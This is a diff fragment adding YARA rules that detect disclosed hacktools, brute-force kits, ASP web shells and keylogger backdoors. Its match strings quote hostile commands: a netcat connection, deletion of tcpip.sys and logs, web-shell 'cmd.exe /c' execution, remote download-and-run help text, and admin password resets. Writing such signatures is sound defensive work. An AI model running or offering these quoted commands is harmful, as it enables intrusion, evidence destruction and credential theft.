+		$s6 = "Example: %s TCP 12.12.12.12 12.12.12.254 21 512 /Banner" fullword ascii
+		$s8 = "Something Wrong About The Ports" fullword ascii
+		$s9 = "Performing Time: %d/%d/%d %d:%d:%d --> " fullword ascii
+		$s10 = "Example: %s TCP 12.12.12.12/24 80 512 /T8 /Save" fullword ascii
+		$s12 = "%u Ports Scanned.Taking %d Threads " fullword ascii
+		$s13 = "%-16s %-5d -> \"%s\"" fullword ascii
+		$s14 = "SYN Scan Can Only Perform On WIN 2K Or Above" fullword ascii
+		$s17 = "SYN Scan: About To Scan %s:%d Using %d Thread" fullword ascii
+		$s18 = "Scan %s Complete In %d Hours %d Minutes %d Seconds. Found %u Open Ports" fullword ascii
+	condition:
+		5 of them
+}
+
+rule Hacktools_CN_Scan_BAT {
+	meta:
+		description = "Disclosed hacktool set - file scan.bat"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "6517d7c245f1300e42f7354b0fe5d9666e5ce52a"
+	strings:
+		$s0 = "for /f %%a in (host.txt) do (" fullword ascii
+		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
+		$s2 = "del host.txt /q" fullword ascii
+		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
+		$s4 = "start Http.exe %%a %http%" fullword ascii
+		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
+	condition:
+		5 of them
+}
+
+rule Hacktools_CN_Panda_Burst {
+	meta:
+		description = "Disclosed hacktool set - file Burst.rar"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "ce8e3d95f89fb887d284015ff2953dbdb1f16776"
+	strings:
+		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr." ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_445_cmd {
+	meta:
+		description = "Disclosed hacktool set - file cmd.bat"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "69b105a3aec3234819868c1a913772c40c6b727a"
+	strings:
+		$bat = "@echo off" fullword ascii
+		$s0 = "cs.exe %1" fullword ascii
+		$s2 = "nc %1 4444" fullword ascii
+	condition:
+		$bat at 0 and all of ($s*)
+}
+
+rule Hacktools_CN_GOGOGO_Bat {
+	meta:
+		description = "Disclosed hacktool set - file GOGOGO.bat"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "4bd4f5b070acf7fe70460d7eefb3623366074bbd"
+	strings:
+		$s0 = "for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%x" fullword ascii
+		$s1 = "http://www.tzddos.com/ -------------------------------------------->byebye.txt" fullword ascii
+		$s2 = "ren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bak" fullword ascii
+		$s4 = "IF /I \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )" fullword ascii
+		$s5 = "copy *.tzddos scan.bat&del *.tzddos" fullword ascii
+		$s6 = "del /f tcpip.sys" fullword ascii
+		$s9 = "if /i \"%CB%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )" fullword ascii
+		$s10 = "call scan.bat" fullword ascii
+		$s12 = "IF /I \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )" fullword ascii
+		$s13 = "IF /I \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )" fullword ascii
+		$s18 = "sc config LmHosts start= auto" fullword ascii
+		$s19 = "copy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nul" fullword ascii
+		$s20 = "ren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak" fullword ascii
+	condition:
+		3 of them
+}
+
+rule Hacktools_CN_Burst_pass {
+	meta:
+		description = "Disclosed hacktool set - file pass.txt"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "55a05cf93dbd274355d798534be471dff26803f9"
+	strings:
+		$s0 = "123456.com" fullword ascii
+		$s1 = "123123.com" fullword ascii
+		$s2 = "360.com" fullword ascii
+		$s3 = "123.com" fullword ascii
+		$s4 = "juso.com" fullword ascii
+		$s5 = "sina.com" fullword ascii
+		$s7 = "changeme" fullword ascii
+		$s8 = "master" fullword ascii
+		$s9 = "google.com" fullword ascii
+		$s10 = "chinanet" fullword ascii
+		$s12 = "lionking" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_JoHor_Posts_Killer {
+	meta:
+		description = "Disclosed hacktool set - file JoHor_Posts_Killer.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "d157f9a76f9d72dba020887d7b861a05f2e56b6a"
+	strings:
+		$s0 = "Multithreading Posts_Send Killer" fullword ascii
+		$s3 = "GET [Access Point] HTTP/1.1" fullword ascii
+		$s6 = "The program's need files was not exist!" fullword ascii
+		$s7 = "JoHor_Posts_Killer" fullword wide
+		$s8 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
+		$s10 = "  ( /s ) :" fullword ascii
+		$s11 = "forms.vbp" fullword ascii
+		$s12 = "forms.vcp" fullword ascii
+		$s13 = "Software\\FlySky\\E\\Install" fullword ascii
+	condition:
+		5 of them
+}
+
+rule Hacktools_CN_Panda_tesksd {
+	meta:
+		description = "Disclosed hacktool set - file tesksd.jpg"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "922147b3e1e6cf1f5dd5f64a4e34d28bdc9128cb"
+	strings:
+		$s0 = "name=\"Microsoft.Windows.Common-Controls\" " fullword ascii
+		$s1 = "ExeMiniDownload.exe" fullword wide
+		$s16 = "POST %Hs" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_Http {
+	meta:
+		description = "Disclosed hacktool set - file Http.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "788bf0fdb2f15e0c628da7056b4e7b1a66340338"
+	strings:
+		$s0 = "RPCRT4.DLL" fullword ascii
+		$s1 = "WNetAddConnection2A" fullword ascii
+		$s2 = "NdrPointerBufferSize" fullword ascii
+		$s3 = "_controlfp" fullword ascii
+	condition:
+		all of them and filesize < 10KB
+}
+
+rule Hacktools_CN_Burst_Start {
+	meta:
+		description = "Disclosed hacktool set - file Start.bat - DoS tool"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "75d194d53ccc37a68286d246f2a84af6b070e30c"
+	strings:
+		$s0 = "for /f \"eol= tokens=1,2 delims= \" %%i in (ip.txt) do (" fullword ascii
+		$s1 = "Blast.bat /r 600" fullword ascii
+		$s2 = "Blast.bat /l Blast.bat" fullword ascii
+		$s3 = "Blast.bat /c 600" fullword ascii
+		$s4 = "start Clear.bat" fullword ascii
+		$s5 = "del Result.txt" fullword ascii
+		$s6 = "s syn %%i %%j 3306 /save" fullword ascii
+		$s7 = "start Thecard.bat" fullword ascii
+		$s10 = "setlocal enabledelayedexpansion" fullword ascii
+	condition:
+		5 of them
+}
+
+rule Hacktools_CN_Panda_tasksvr {
+	meta:
+		description = "Disclosed hacktool set - file tasksvr.exe"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "a73fc74086c8bb583b1e3dcfd326e7a383007dc0"
+	strings:
+		$s2 = "Consys21.dll" fullword ascii
+		$s4 = "360EntCall.exe" fullword wide
+		$s15 = "Beijing1" fullword ascii
+	condition:
+		all of them
+}
+rule Hacktools_CN_Burst_Clear {
+	meta:
+		description = "Disclosed hacktool set - file Clear.bat"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "148c574a4e6e661aeadaf3a4c9eafa92a00b68e4"
+	strings:
+		$s0 = "del /f /s /q %systemdrive%\\*.log    " fullword ascii
+		$s1 = "del /f /s /q %windir%\\*.bak    " fullword ascii
+		$s4 = "del /f /s /q %systemdrive%\\*.chk    " fullword ascii
+		$s5 = "del /f /s /q %systemdrive%\\*.tmp    " fullword ascii
+		$s8 = "del /f /q %userprofile%\\COOKIES s\\*.*    " fullword ascii
+		$s9 = "rd /s /q %windir%\\temp & md %windir%\\temp    " fullword ascii
+		$s11 = "del /f /s /q %systemdrive%\\recycled\\*.*    " fullword ascii
+		$s12 = "del /f /s /q \"%userprofile%\\Local Settings\\Temp\\*.*\"    " fullword ascii
+		$s19 = "del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\"   " ascii
+	condition:
+		5 of them
+}
+
+rule Hacktools_CN_Burst_Thecard {
+	meta:
+		description = "Disclosed hacktool set - file Thecard.bat"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "50b01ea0bfa5ded855b19b024d39a3d632bacb4c"
+	strings:
+		$s0 = "tasklist |find \"Clear.bat\"||start Clear.bat" fullword ascii
+		$s1 = "Http://www.coffeewl.com" fullword ascii
+		$s2 = "ping -n 2 localhost 1>nul 2>nul" fullword ascii
+		$s3 = "for /L %%a in (" fullword ascii
+		$s4 = "MODE con: COLS=42 lines=5" fullword ascii
+	condition:
+		all of them
+}
+
+rule Hacktools_CN_Burst_Blast {
+	meta:
+		description = "Disclosed hacktool set - file Blast.bat"
+		author = "Florian Roth"
+		date = "17.11.14"
+		score = 60
+		hash = "b07702a381fa2eaee40b96ae2443918209674051"
+	strings:
+		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http:" ascii
+		$s1 = "@echo off" fullword ascii
+	condition:
+		all of them
+}
+
+rule VUBrute_VUBrute {
+	meta:
+		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file VUBrute.exe"
+		author = "Florian Roth"
+		date = "22.11.14"
+		score = 70
+		hash = "166fa8c5a0ebb216c832ab61bf8872da556576a7"
+	strings:
+		$s0 = "Text Files (*.txt);;All Files (*)" fullword ascii
+		$s1 = "http://ubrute.com" fullword ascii
+		$s11 = "IP - %d; Password - %d; Combination - %d" fullword ascii
+		$s14 = "error.txt" fullword ascii
+	condition:
+		all of them
+}
+
+rule DK_Brute {
+	meta:
+		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file DK Brute.exe"
+		author = "Florian Roth"
+		date = "22.11.14"
+		score = 70
+		reference = "http://goo.gl/xiIphp"
+		hash = "93b7c3a01c41baecfbe42461cb455265f33fbc3d"
+	strings:
+		$s6 = "get_CrackedCredentials" fullword ascii
+		$s13 = "Same port used for two different protocols:" fullword wide
+		$s18 = "coded by fLaSh" fullword ascii
+		$s19 = "get_grbToolsScaningCracking" fullword ascii
+	condition:
+		all of them
+}
+
+rule VUBrute_config {
+	meta:
+		description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file config.ini"
+		author = "Florian Roth"
+		date = "22.11.14"
+		score = 70
+		reference = "http://goo.gl/xiIphp"
+		hash = "b9f66b9265d2370dab887604921167c11f7d93e9"
+	strings:
+		$s2 = "Restore=1" fullword ascii
+		$s6 = "Thread=" ascii
+		$s7 = "Running=1" fullword ascii
+		$s8 = "CheckCombination=" fullword ascii
+		$s10 = "AutoSave=1.000000" fullword ascii
+		$s12 = "TryConnect=" ascii
+		$s13 = "Tray=" ascii
+	condition:
+		all of them
+}
+
+rule sig_238_hunt {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file hunt.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "f9f059380d95c7f8d26152b1cb361d93492077ca"
+	strings:
+		$s1 = "Programming by JD Glaser - All Rights Reserved" fullword ascii
+		$s3 = "Usage - hunt \\\\servername" fullword ascii
+		$s4 = ".share = %S - %S" fullword wide
+		$s5 = "SMB share enumerator and admin finder " fullword ascii
+		$s7 = "Hunt only runs on Windows NT..." fullword ascii
+		$s8 = "User = %S" fullword ascii
+		$s9 = "Admin is %s\\%s" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_listip {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file listip.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "f32a0c5bf787c10eb494eb3b83d0c7a035e7172b"
+	strings:
+		$s0 = "ERROR!!! Bad host lookup. Program Terminate." fullword ascii
+		$s2 = "ERROR No.2!!! Program Terminate." fullword ascii
+		$s4 = "Local Host Name: %s" fullword ascii
+		$s5 = "Packed by exe32pack 1.38" fullword ascii
+		$s7 = "Local Computer Name: %s" fullword ascii
+		$s8 = "Local IP Adress: %s" fullword ascii
+	condition:
+		all of them
+}
+
+rule ArtTrayHookDll {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file ArtTrayHookDll.dll"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "4867214a3d96095d14aa8575f0adbb81a9381e6c"
+	strings:
+		$s0 = "ArtTrayHookDll.dll" fullword ascii
+		$s7 = "?TerminateHook@@YAXXZ" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_eee {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file eee.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "236916ce2980c359ff1d5001af6dacb99227d9cb"
+	strings:
+		$s0 = "szj1230@yesky.com" fullword wide
+		$s3 = "C:\\Program Files\\DevStudio\\VB\\VB5.OLB" fullword ascii
+		$s4 = "MailTo:szj1230@yesky.com" fullword wide
+		$s5 = "Command1_Click" fullword ascii
+		$s7 = "software\\microsoft\\internet explorer\\typedurls" fullword wide
+		$s11 = "vb5chs.dll" fullword ascii
+		$s12 = "MSVBVM50.DLL" fullword ascii
+	condition:
+		all of them
+}
+
+rule aspbackdoor_asp4 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file asp4.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "faf991664fd82a8755feb65334e5130f791baa8c"
+	strings:
+		$s0 = "system.dll" fullword ascii
+		$s2 = "set sys=server.CreateObject (\"system.contral\") " fullword ascii
+		$s3 = "Public Function reboot(atype As Variant)" fullword ascii
+		$s4 = "t& = ExitWindowsEx(1, atype)" ascii
+		$s5 = "atype=request(\"atype\") " fullword ascii
+		$s7 = "AceiveX dll" fullword ascii
+		$s8 = "Declare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal " ascii
+		$s10 = "sys.reboot(atype)" fullword ascii
+	condition:
+		all of them
+}
+
+rule aspfile1 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file aspfile1.asp"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "77b1e3a6e8f67bd6d16b7ace73dca383725ac0af"
+	strings:
+		$s0 = "' -- check for a command that we have posted -- '" fullword ascii
+		$s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword ascii
+		$s5 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"><BODY>" fullword ascii
+		$s6 = "<input type=text name=\".CMD\" size=45 value=\"<%= szCMD %>\">" fullword ascii
+		$s8 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword ascii
+		$s15 = "szCMD = Request.Form(\".CMD\")" fullword ascii
+	condition:
+		3 of them
+}
+
+rule EditServer_HackTool {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file EditServer.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "87b29c9121cac6ae780237f7e04ee3bc1a9777d3"
+	strings:
+		$s0 = "%s Server.exe" fullword ascii
+		$s1 = "Service Port: %s" fullword ascii
+		$s2 = "The Port Must Been >0 & <65535" fullword ascii
+		$s8 = "3--Set Server Port" fullword ascii
+		$s9 = "The Server Password Exceeds 32 Characters" fullword ascii
+		$s13 = "Service Name: %s" fullword ascii
+		$s14 = "Server Password: %s" fullword ascii
+		$s17 = "Inject Process Name: %s" fullword ascii
+
+		$x1 = "WinEggDrop Shell Congirator" fullword ascii
+	condition:
+		5 of ($s*) or $x1
+}
+
+rule sig_238_letmein {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file letmein.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "74d223a56f97b223a640e4139bb9b94d8faa895d"
+	strings:
+		$s1 = "Error get globalgroup memebers: NERR_InvalidComputer" fullword ascii
+		$s6 = "Error get users from server!" fullword ascii
+		$s7 = "get in nt by name and null" fullword ascii
+		$s16 = "get something from nt, hold by killusa." fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_token {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file token.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "c52bc6543d4281aa75a3e6e2da33cfb4b7c34b14"
+	strings:
+		$s0 = "Logon.exe" fullword ascii
+		$s1 = "Domain And User:" fullword ascii
+		$s2 = "PID=Get Addr$(): One" fullword ascii
+		$s3 = "Process " fullword ascii
+		$s4 = "psapi.dllK" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_TELNET {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file TELNET.EXE from Windows ME"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "50d02d77dc6cc4dc2674f90762a2622e861d79b1"
+	strings:
+		$s0 = "TELNET [host [port]]" fullword wide
+		$s2 = "TELNET.EXE" fullword wide
+		$s4 = "Microsoft(R) Windows(R) Millennium Operating System" fullword wide
+		$s14 = "Software\\Microsoft\\Telnet" fullword wide
+	condition:
+		all of them
+}
+
+rule snifferport {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file snifferport.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "d14133b5eaced9b7039048d0767c544419473144"
+	strings:
+		$s0 = "iphlpapi.DLL" fullword ascii
+		$s5 = "ystem\\CurrentCorolSet\\" fullword ascii
+		$s11 = "Port.TX" fullword ascii
+		$s12 = "32Next" fullword ascii
+		$s13 = "V1.2 B" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_webget {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file webget.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "36b5a5dee093aa846f906bbecf872a4e66989e42"
+	strings:
+		$s0 = "Packed by exe32pack" ascii
+		$s1 = "GET A HTTP/1.0" fullword ascii
+		$s2 = " error " fullword ascii
+		$s13 = "Downloa" ascii
+	condition:
+		all of them
+}
+
+rule XYZCmd_zip_Folder_XYZCmd {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file XYZCmd.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "bbea5a94950b0e8aab4a12ad80e09b630dd98115"
+	strings:
+		$s0 = "Executes Command Remotely" fullword wide
+		$s2 = "XYZCmd.exe" fullword wide
+		$s6 = "No Client Software" fullword wide
+		$s19 = "XYZCmd V1.0 For NT S" fullword ascii
+	condition:
+		all of them
+}
+
+rule ASPack_Chinese {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file ASPack Chinese.ini"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "02a9394bc2ec385876c4b4f61d72471ac8251a8e"
+	strings:
+		$s0 = "= Click here if you want to get your registered copy of ASPack" fullword ascii
+		$s1 = ";  For beginning of translate - copy english.ini into the yourlanguage.ini" fullword ascii
+		$s2 = "E-Mail:                      shinlan@km169.net" fullword ascii
+		$s8 = ";  Please, translate text only after simbol '='" fullword ascii
+		$s19 = "= Compress with ASPack" fullword ascii
+	condition:
+		all of them
+}
+
+rule aspbackdoor_EDIR {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file EDIR.ASP"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "03367ad891b1580cfc864e8a03850368cbf3e0bb"
+	strings:
+		$s1 = "response.write \"<a href='index.asp'>" fullword ascii
+		$s3 = "if Request.Cookies(\"password\")=\"" ascii
+		$s6 = "whichdir=server.mappath(Request(\"path\"))" fullword ascii
+		$s7 = "Set fs = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+		$s19 = "whichdir=Request(\"path\")" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_filespy {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file filespy.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 50
+		hash = "89d8490039778f8c5f07aa7fd476170293d24d26"
+	strings:
+		$s0 = "Hit [Enter] to begin command mode..." fullword ascii
+		$s1 = "If you are in command mode," fullword ascii
+		$s2 = "[/l] lists all the drives the monitor is currently attached to" fullword ascii
+		$s9 = "FileSpy.exe" fullword wide
+		$s12 = "ERROR starting FileSpy..." fullword ascii
+		$s16 = "exe\\filespy.dbg" fullword ascii
+		$s17 = "[/d <drive>] detaches monitor from <drive>" fullword ascii
+		$s19 = "Should be logging to screen..." fullword ascii
+		$s20 = "Filmon:  Unknown log record type" fullword ascii
+	condition:
+		7 of them
+}
+
+rule ByPassFireWall_zip_Folder_Ie {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Ie.dll"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "d1b9058f16399e182c9b78314ad18b975d882131"
+	strings:
+		$s0 = "d:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dll" fullword ascii
+		$s1 = "LOADER ERROR" fullword ascii
+		$s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		$s7 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
+	condition:
+		all of them
+}
+
+rule EditKeyLogReadMe {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file EditKeyLogReadMe.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "dfa90540b0e58346f4b6ea12e30c1404e15fbe5a"
+	strings:
+		$s0 = "editKeyLog.exe KeyLog.exe," fullword ascii
+		$s1 = "WinEggDrop.DLL" fullword ascii
+		$s2 = "nc.exe" fullword ascii
+		$s3 = "KeyLog.exe" fullword ascii
+		$s4 = "EditKeyLog.exe" fullword ascii
+		$s5 = "wineggdrop" fullword ascii
+	condition:
+		3 of them
+}
+
+rule PassSniffer_zip_Folder_readme {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file readme.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "a52545ae62ddb0ea52905cbb61d895a51bfe9bcd"
+	strings:
+		$s0 = "PassSniffer.exe" fullword ascii
+		$s1 = "POP3/FTP Sniffer" fullword ascii
+		$s2 = "Password Sniffer V1.0" fullword ascii
+	condition:
+		1 of them
+}
+
+rule sig_238_gina {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file gina.reg"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "324acc52566baf4afdb0f3e4aaf76e42899e0cf6"
+	strings:
+		$s0 = "\"gina\"=\"gina.dll\"" fullword ascii
+		$s1 = "REGEDIT4" fullword ascii
+		$s2 = "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]" fullword ascii
+	condition:
+		all of them
+}
+
+rule splitjoin {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "e4a9ef5d417038c4c76b72b5a636769a98bd2f8c"
+	strings:
+		$s0 = "Not for distribution without the authors permission" fullword wide
+		$s2 = "Utility to split and rejoin files.0" fullword wide
+		$s5 = "Copyright (c) Angus Johnson 2001-2002" fullword wide
+		$s19 = "SplitJoin" fullword wide
+	condition:
+		all of them
+}
+
+rule EditKeyLog {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file EditKeyLog.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "a450c31f13c23426b24624f53873e4fc3777dc6b"
+	strings:
+		$s1 = "Press Any Ke" fullword ascii
+		$s2 = "Enter 1 O" fullword ascii
+		$s3 = "Bon >0 & <65535L" fullword ascii
+		$s4 = "--Choose " fullword ascii
+	condition:
+		all of them
+}
+
+rule PassSniffer {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file PassSniffer.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "dcce4c577728e8edf7ed38ac6ef6a1e68afb2c9f"
+	strings:
+		$s2 = "Sniff" fullword ascii
+		$s3 = "GetLas" fullword ascii
+		$s4 = "VersionExA" fullword ascii
+		$s10 = " Only RuntUZ" fullword ascii
+		$s12 = "emcpysetprintf\\" fullword ascii
+		$s13 = "WSFtartup" fullword ascii
+	condition:
+		all of them
+}
+
+rule aspfile2 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file aspfile2.asp"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "14efbc6cb01b809ad75a535d32b9da4df517ff29"
+	strings:
+		$s0 = "response.write \"command completed success!\" " fullword ascii
+		$s1 = "for each co in foditems " fullword ascii
+		$s3 = "<input type=text name=text6 value=\"<%= szCMD6 %>\"><br> " fullword ascii
+		$s19 = "<title>Hello! Welcome </title>" fullword ascii
+	condition:
+		all of them
+}
+
+rule UnPack_rar_Folder_InjectT {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "80f39e77d4a34ecc6621ae0f4d5be7563ab27ea6"
+	strings:
+		$s0 = "%s -Install                          -->To Install The Service" fullword ascii
+		$s1 = "Explorer.exe" fullword ascii
+		$s2 = "%s -Start                            -->To Start The Service" fullword ascii
+		$s3 = "%s -Stop                             -->To Stop The Service" fullword ascii
+		$s4 = "The Port Is Out Of Range" fullword ascii
+		$s7 = "Fail To Set The Port" fullword ascii
+		$s11 = "\\psapi.dll" fullword ascii
+		$s20 = "TInject.Dll" fullword ascii
+
+		$x1 = "Software\\Microsoft\\Internet Explorer\\WinEggDropShell" fullword ascii
+		$x2 = "injectt.exe" fullword ascii
+	condition:
+		( 1 of ($x*) ) and ( 3 of ($s*) )
+}
+
+rule Jc_WinEggDrop_Shell {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "820674b59f32f2cf72df50ba4411d7132d863ad2"
+	strings:
+		$s0 = "Sniffer.dll" fullword ascii
+		$s4 = ":Execute net.exe user Administrator pass" fullword ascii
+		$s5 = "Fport.exe or mport.exe " fullword ascii
+		$s6 = ":Password Sniffering Is Running |Not Running " fullword ascii
+		$s9 = ": The Terminal Service Port Has Been Set To NewPort" fullword ascii
+		$s15 = ": Del www.exe                   " fullword ascii
+		$s20 = ":Dir *.exe                    " fullword ascii
+	condition:
+		2 of them
+}
+
+rule aspbackdoor_asp1 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file asp1.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "9ef9f34392a673c64525fcd56449a9fb1d1f3c50"
+	strings:
+		$s0 = "param = \"driver={Microsoft Access Driver (*.mdb)}\" " fullword ascii
+		$s1 = "conn.Open param & \";dbq=\" & Server.MapPath(\"scjh.mdb\") " fullword ascii
+		$s6 = "set rs=conn.execute (sql)%> " fullword ascii
+		$s7 = "<%set Conn = Server.CreateObject(\"ADODB.Connection\") " fullword ascii
+		$s10 = "<%dim ktdh,scph,scts,jhqtsj,yhxdsj,yxj,rwbh " fullword ascii
+		$s15 = "sql=\"select * from scjh\" " fullword ascii
+	condition:
+		all of them
+}
+
+rule QQ_zip_Folder_QQ {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file QQ.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "9f8e3f40f1ac8c1fa15a6621b49413d815f46cfb"
+	strings:
+		$s0 = "EMAIL:haoq@neusoft.com" fullword wide
+		$s1 = "EMAIL:haoq@neusoft.com" fullword wide
+		$s4 = "QQ2000b.exe" fullword wide
+		$s5 = "haoq@neusoft.com" fullword ascii
+		$s9 = "QQ2000b.exe" fullword ascii
+		$s10 = "\\qq2000b.exe" fullword ascii
+		$s12 = "WINDSHELL STUDIO[WINDSHELL " fullword wide
+		$s17 = "SOFTWARE\\HAOQIANG\\" fullword ascii
+	condition:
+		5 of them
+}
+
+rule UnPack_rar_Folder_TBack {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file TBack.DLL"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "30fc9b00c093cec54fcbd753f96d0ca9e1b2660f"
+	strings:
+		$s0 = "Redirect SPort RemoteHost RPort       -->Port Redirector" fullword ascii
+		$s1 = "http://IP/a.exe a.exe                 -->Download A File" fullword ascii
+		$s2 = "StopSniffer                           -->Stop Pass Sniffer" fullword ascii
+		$s3 = "TerminalPort Port                     -->Set New Terminal Port" fullword ascii
+		$s4 = "Example: Http://12.12.12.12/a.exe abc.exe" fullword ascii
+		$s6 = "Create Password Sniffering Thread Successfully. Status:Logging" fullword ascii
+		$s7 = "StartSniffer NIC                      -->Start Sniffer" fullword ascii
+		$s8 = "Shell                                 -->Get A Shell" fullword ascii
+		$s11 = "DeleteService ServiceName             -->Delete A Service" fullword ascii
+		$s12 = "Disconnect ThreadNumber|All           -->Disconnect Others" fullword ascii
+		$s13 = "Online                                -->List All Connected IP" fullword ascii
+		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword ascii
+		$s16 = "Example: Set REG_SZ Test Trojan.exe" fullword ascii
+		$s18 = "Execute Program                       -->Execute A Program" fullword ascii
+		$s19 = "Reboot                                -->Reboot The System" fullword ascii
